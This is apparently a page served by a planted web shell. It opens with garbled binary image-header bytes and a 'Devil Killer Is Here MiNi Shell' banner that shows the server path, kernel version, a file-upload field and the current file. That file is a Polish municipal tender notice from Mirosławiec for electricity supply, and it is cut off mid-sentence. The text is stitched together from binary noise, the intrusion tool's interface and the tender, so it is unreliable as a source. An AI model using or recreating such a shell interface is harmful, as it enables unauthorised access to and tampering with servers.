JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210921/0018771801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa energii elektrycznej wraz z usługą dystrybucji energii elektrycznej dla potrzeb Gminy i Miasta Mirosławiec, jednostek organizacyjnych Gminy oraz Instytucji kultury </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina i Miasto Mirosławiec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 570791508</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wolności 37</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mirosławiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-650</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">672595042</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@miroslawiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.miroslawiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa energii elektrycznej wraz z usługą dystrybucji energii elektrycznej dla potrzeb Gminy i Miasta Mirosławiec, jednostek organizacyjnych Gminy oraz Instytucji kultury </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d91acc0f-1ad9-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00187718</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002115/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa energii elektrycznej wraz z usługą dystrybucji dla Gminy i Miasta Mirosławiec</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/miroslawiec/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) Z zastrzeżeniem art. 61 ust. 2<br/>ustawy, komunikacja między zamawiającym a wykonawcami, w tym oferty oraz wszelkie oświadczenia,<br/>wnioski (w tym o wyjaśnienie treści SWZ), zawiadomienia i informacje przekazywane<br/>są wyłącznie poprzez ich złożenie na Platformie OpenNexus pod adresem:<br/>https://platformazakupowa.pl/ (zwanej dalej: „Platformą").<br/>2) Korespondencja przekazana zamawiającemu w inny sposób (np. listownie,<br/>mailem) nie będzie brana pod uwagę.<br/>3) Adres Platformy: https://platformazakupowa.pl/pn/miroslawiec/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Ofertę i<br/>oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, składa się, pod rygorem nieważności w formie<br/>elektronicznej (tj. przy użyciu kwalifikowanego podpisu elektronicznego) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. 2)Sposób sporządzenia podmiotowych<br/>środków dowodowych, przedmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz w rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>3)Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności<br/>logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności<br/>podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce<br/>„Instrukcje dla Wykonawców” na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje.<br/>4)W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij<br/>wiadomość do zamawiającego”. 5)Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień.oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez<br/>kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że<br/>wiadomość została wysłana do zamawiającego. 6)Korespondencja, której zgodnie z obowiązującymi<br/>przepisami adresatem jest dany wykonawca, będzie przekazywana w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl do danego wykonawcy. 7)Zamawiający, określił w Rozdziale II<br/>SWZ niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na platformazakupowa.pl.<br/>8)Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1.akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na<br/>stronie internetowej pod linkiem w zakładce „Regulamin” oraz uznaje go za wiążący,<br/>2.zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod:<br/>https://platformazakupowa.pl/strona/45-instrukcje. 9)Wykonawca nie może wycofać oferty po upływie<br/>terminu składania ofert.10)Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie<br/>wymaga posiadania konta na Platformie ani logowania do Platformy.11)Zgodnie z przepisem art. 64<br/>ustawy Platforma jest kompatybilna ze wszystkimi podpisami elektronicznymi. Do przesłania<br/>dokumentów niezbędne jest posiadanie kwalifikowanego podpisu elektronicznego, podpisu zaufanego<br/>lub podpisu osobistego, w celu potwierdzenia czynności złożenia oferty. 12)Szczegółowe informacje o<br/>sposobie pozyskania usługi kwalifikowanego podpisu elektronicznego oraz warunkach jego użycia<br/>można znaleźć na stronach internetowych kwalifikowanych dostawców usług zaufania, których lista<br/>znajduje się pod adresem internetowym: http://www.nccert.pl/kontakt.htm. W zależności od formatu<br/>kwalifikowanego podpisu (PAdES, XAdES) i jego typu(zewnętrzny, wewnętrzny) wykonawca dołącza<br/>do Platformy uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ<br/>zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny):a)dokumenty w formacie .pdf należy<br/>podpisywać tylko formatem PAdES; b)zamawiający dopuszcza podpisanie dokumentów w formacie<br/>innym niż .pdf, wtedy należy użyć formatu XAdES. Z uwagi na limit znaków pozostałe wymagania zostały zawarte w Rozdziale II SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 RODO, zamawiający informuje,<br/>że:<br/>1) administratorem, a w przypadku zamówień współfinansowanych ze środków<br/>UE (jeżeli dotyczy) również podmiotem przetwarzającym wszelkie dane<br/>osobowe osób fizycznych związanych z niniejszym postępowaniem jest<br/>Gmina i Miasto Mirosławiec – Urząd Miejski w Mirosławcu,<br/>2) kontakt do inspektora ochrony danych osobowych w Urzędzie Miejskim w Mirosławcu: adres e-mail:<br/>iod@miroslawiec.pl,<br/>3) dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z postępowaniem o udzielenie niniejszego zamówienia,<br/>4) odbiorcami ww. danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz<br/>art. 74 ustawy oraz umowy dofinansowania (jeżeli dotyczy),<br/>5) ww. dane osobowe będą przechowywane odpowiednio:<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia publicznego albo przez cały okres obowiązywania umowy<br/>w sprawie zamówienia publicznego – jeżeli okres obowiązywania umowy<br/>przekracza 4 lata;<br/>przez okres, o którym mowa w art. 125 ust. 4 lit. d) w zw. z art. 140<br/>rozporządzenia Parlamentu Europejskiego nr 1303/2013 z dnia 17.12.2013 r.<br/>w przypadku zamówień współfinansowanych ze środków UE;<br/>do czasu przeprowadzania archiwizacji dokumentacji – w zakresie<br/>określonym w przepisach o archiwizacji,<br/>6) obowiązek podania danych osobowych jest wymogiem ustawowym<br/>określonym w przepisach ustawy, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych<br/>danych wynikają z ustawy,<br/>7) w odniesieniu do danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>8) osoba fizyczna, której dane osobowe dotyczą posiada:<br/>a) na podstawie art. 15 RODO prawo dostępu do ww. danych osobowych.<br/>W przypadku korzystania przez osobę, której dane osobowe<br/>są przetwarzane przez zamawiającego, z uprawnienia o którym mowa<br/>w art. 15 ust. 1-3 RODO, zamawiający może żądać od osoby, występującej<br/>z żądaniem wskazania dodatkowych informacji, mających na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia;<br/>b) na podstawie art. 16 RODO prawo do sprostowania ww. danych osobowych<br/>(skorzystanie z prawa do sprostowania lub uzupełnienia nie może<br/>skutkować zmianą wyniku postępowania o udzielenie zamówienia ani<br/>zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie<br/>niezgodnym z ustawą oraz nie może naruszać integralności protokołu<br/>postępowania oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych. Zgłoszenie żądania ograniczenia<br/>przetwarzania nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania. W przypadku, gdy wniesienie żądania<br/>dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO, spowoduje<br/>ograniczenie przetwarzania danych zawartych w protokole postępowania<br/>lub załącznikach do tego protokołu, od dnia zakończenia postępowania<br/>o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba,<br/>że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy przetwarzanie danych osobowych narusza przepisy<br/>RODO,<br/>e) osobie fizycznej, której dane osobowe dotyczą nie przysługuje:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest<br/>art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IGN.271.20.2021.AS.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usługi kompleksowej polegającej na dostawie<br/>energii elektrycznej wraz z usługą dystrybucji energii elektrycznej na potrzeby zamawiającego,<br/>jego jednostek organizacyjnych oraz Instytucji kultury. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09310000-5 - Elektryczność</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może się ubiegać wykonawca, który spełnia poniżej<br/>określone warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>zamawiający uzna, że wykonawca posiada wymagane przepisami prawa uprawnienia do<br/>prowadzenia działalności zawodowej, jeżeli wykonawca wykaże, że:<br/>a) posiada koncesję na prowadzenie działalności gospodarczej w zakresie obrotu energią<br/>elektryczną wydaną przez Prezesa Urzędu Regulacji Energetyki;<br/>b) koncesję na prowadzenie działalności gospodarczej w zakresie dystrybucji energii elektrycznej wydaną przez Prezesa Urzędu Regulacji Energetyki. W przypadku, gdy wykonawca<br/>nie jest właścicielem sieci dystrybucyjnej, musi posiadać podpisaną umowę z Operatorem<br/>Systemu Dystrybucyjnego (OSD) na świadczenie usług dystrybucji energii elektrycznej przez<br/>OSD.<br/>W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia, ww. koncesje<br/>muszą posiadać wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia, którzy w<br/>ramach realizacji zamówienia wykonywać będą czynności wymagające posiadania ww.<br/>uprawnień.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku;<br/>4) zdolności technicznej lub zawodowej:<br/>zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>O udzielenie zamówienia może się ubiegać wykonawca, który nie podlega<br/>wykluczeniu z postępowania na podstawie art. 108 oraz art. 109 ust. 1 pkt 4) ustawy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie żąda podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) ważna koncesja na prowadzenie działalności gospodarczej w zakresie<br/>obrotu energią elektryczną, wydaną przez Prezesa Urzędu Regulacji Energetyki;<br/>2) ważna koncesja na prowadzenie działalności gospodarczej w zakresie dystrybucji energii<br/>elektrycznej wydana przez Prezesa Urzędu Regulacji Energetyki. W przypadku, gdy wykonawca nie<br/>jest właścicielem sieci dystrybucyjnej, musi posiadać podpisaną umowę z Operatorem Systemu<br/>Dystrybucyjnego (OSD) na świadczenie usług dystrybucji energii elektrycznej przez OSD.<br/>3. Na podstawie art. 128 ust. 1 ustawy, jeżeli wykonawca nie złoży oświadczenia,<br/>o którym mowa w art. 125 ust. 1 ustawy, podmiotowych środków dowodowych,<br/>innych dokumentów lub oświadczeń składanych w postępowaniu lub będą one<br/>niekompletne lub będą zawierać błędy, zamawiający wezwie wykonawcę<br/>odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie z zastrzeżeniem<br/>art. 128 ust. 1 pkt 1 i 2 ustawy.<br/>oświadczenie wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia wskazujące, które usługi, wykonają poszczególni<br/>wykonawcy, według wzoru stanowiącego załącznik nr 1 do SWZ;<br/>Uwaga! Ww. dokument należy złożyć w przypadku wspólnego ubiegania sie<br/>wykonawców o udzielenie zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający w niniejszym postępowaniu nie żąda od wykonawców przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty wymagane przez zamawiającego, które należy złożyć składając ofertę:<br/>1) formularz oferty, według wzoru stanowiącego załącznik nr 1 do SWZ;<br/>2) formularz cenowy, według wzoru stanowiącego załącznik nr 1a do SWZ<br/>3) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru, w celu potwierdzenia, że osoba działająca w imieniu (odpowiednio: wykonawcy lub<br/>podmiotu udostępniającego zasoby) jest umocowana do jego<br/>reprezentowania; wykonawca nie jest zobowiązany do złożenia ww. dokumentów, jeżeli<br/>zamawiający może je uzyskać za pomocą bezpłatnych<br/>i ogólnodostępnych baz danych, o ile wykonawca wskazał w załączniku nr 1<br/>do SWZ (formularz oferty) dane umożliwiające dostęp do tych dokumentów;<br/>4) pełnomocnictwa lub inne dokumenty potwierdzające umocowanie do reprezentowania<br/>(odpowiednio: wykonawcy, podmiotu udostępniającego zasoby, wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia), jeżeli w imieniu (odpowiednio: wykonawcy, podmiotu<br/>udostępniającego zasoby, wykonawców wspólnie ubiegających się o udzielenie zamówienia)<br/>działa osoba, której umocowanie do reprezentowania nie wynika z dokumentów, o których mowa<br/>w pkt 1 ppkt 2);<br/>5) oświadczenie wykonawcy o niepodleganiu wykluczeniu, według wzoru<br/>stanowiącego załącznik nr 2 do SWZ;<br/>Uwaga! W przypadku wspólnego ubiegania się wykonawców o udzielenie<br/>zamówienia ww. dokument składa każdy z wykonawców.<br/>6) oświadczenie wykonawcy o spełnianiu warunków udziału<br/>w postępowaniu, według wzoru stanowiącego załącznik nr 3 do SWZ;<br/>Uwaga! W przypadku wspólnego ubiegania się wykonawców o udzielenie<br/>zamówienia ww. dokument składa każdy z wykonawców, w zakresie, w jakim<br/>wykazuje spełnianie warunków udziału w postępowaniu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/>ich w postępowaniu i zawarcia umowy.<br/>2. Pełnomocnictwo, o którym mowa w pkt 1 należy dołączyć do oferty.<br/>3. Wszelką korespondencję w postępowaniu zamawiający kieruje do 